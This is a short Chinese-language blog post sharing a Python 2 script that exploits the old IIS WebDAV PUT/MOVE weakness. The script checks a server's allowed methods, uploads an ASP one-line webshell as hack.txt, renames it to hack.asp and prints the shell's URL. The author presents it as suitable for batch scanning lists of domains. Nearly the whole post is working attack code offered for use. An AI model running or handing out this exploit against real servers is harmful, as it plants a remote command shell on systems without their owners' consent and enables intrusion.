python IIS Put File脚本

平日上班忙,没怎么整理PC里的代码。 把以前写的IIS put file漏洞的利用脚本发一下,这漏洞实在很古老了。。。

#-*- encoding:utf-8 -*-

'''
IIS put file From https://www.lijiejie.com

Usage:
    iisPUT.py www.example.com:8080
'''

import httplib
import sys

try:
    conn = httplib.HTTPConnection(sys.argv[1])
    conn.request(method='OPTIONS', url='/')
    headers = dict(conn.getresponse().getheaders())
    if headers.get('server', '').find('Microsoft-IIS') < 0:
        print 'This is not an IIS web server'
        
    if 'public' in headers and \
       headers['public'].find('PUT') > 0 and \
       headers['public'].find('MOVE') > 0:
        conn.close()
        conn = httplib.HTTPConnection(sys.argv[1])
        # PUT hack.txt
        conn.request( method='PUT', url='/hack.txt', body='<%execute(request("cmd"))%>' )
        conn.close()
        conn = httplib.HTTPConnection(sys.argv[1])
        # mv hack.txt to hack.asp
        conn.request(method='MOVE', url='/hack.txt', headers={'Destination': '/hack.asp'})
        print 'ASP webshell:', 'http://' + sys.argv[1] + '/hack.asp'
    else:
        print 'Server not vulnerable'
        
except Exception,e:
    print 'Error:', e

在有域名列表的前提下,用来做批量扫描倒还是可以的。
不过目前仍存在PUT File漏洞的主机,实在很少了。
Gist: https://gist.github.com/lijiejie/3eb6c4a1db9b3fe3c59a

《python IIS Put File脚本》上有3条评论

发表回复

您的电子邮箱地址不会被公开。 必填项已用 * 标注